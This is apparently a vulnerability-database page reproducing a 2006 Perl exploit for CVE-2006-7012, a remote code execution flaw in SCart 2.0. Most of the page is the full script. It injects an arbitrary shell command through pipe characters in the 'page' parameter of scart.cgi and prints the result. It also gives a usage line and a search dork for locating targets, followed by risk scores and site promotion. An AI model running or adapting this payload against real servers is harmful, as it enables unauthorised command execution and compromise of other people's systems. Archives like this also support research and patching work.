SCart 2.0 - 'page' Remote Code Execution
| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
| CVE-2006-7012 | 15 Feb 200702:00 | – | cve | |
| CVE-2006-7012 | 15 Feb 200702:00 | – | cvelist | |
| EUVD-2006-6994 | 7 Oct 202500:30 | – | euvd | |
| CVE-2006-7012 | 15 Feb 200702:28 | – | nvd | |
| Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 15 Feb 200700:00 | – | securityvulns |
#!/usr/bin/perl
##
# SCart 2.0 Remote Code Execution Exploit
# Bugs Found & code By K-159
#
## base on advisory at http://advisories.echo.or.id/adv/adv32-K-159-2006.txt
#
# echo.or.id (c) 2006
#
##
# usage:
# perl scart.pl <target> </path/> "cmd"
#
# Google Dork : site: scartserver.com
#
# Greetz: my soul mate,echo|staff,aikmel|crew,masterpop3,SinChan,rizal,etc
#
# Contact: eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net
#
use IO::Socket;
use LWP::Simple;
sub Usage {
print STDERR "\n ========================================================= \r\n";
print STDERR " *SCart 2.0 Remote Code Execution Exploit* \r\n";
print STDERR " Bugs Found by K-159 \r\n";
print STDERR " www.echo.or.id #e-c-h-o irc.dal.net \r\n";
print STDERR " Usage: $0 <www.target.com> </path/> \"cmd\" \r\n";
print STDERR "============================================================= \r\n";
exit;
}
if (@ARGV < 3)
{
Usage();
}
$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];
print "\n[+] Conecting to $host\n";
my $result = get("http://$host$path/scart.cgi?action=show_page&base= base2.html&page=browse.txt|$command|");
if (defined $result) {
print $result;
}
else {
print "Exploit Failed.\n";
}
# milw0rm.com [2006-06-04]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jun 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.04915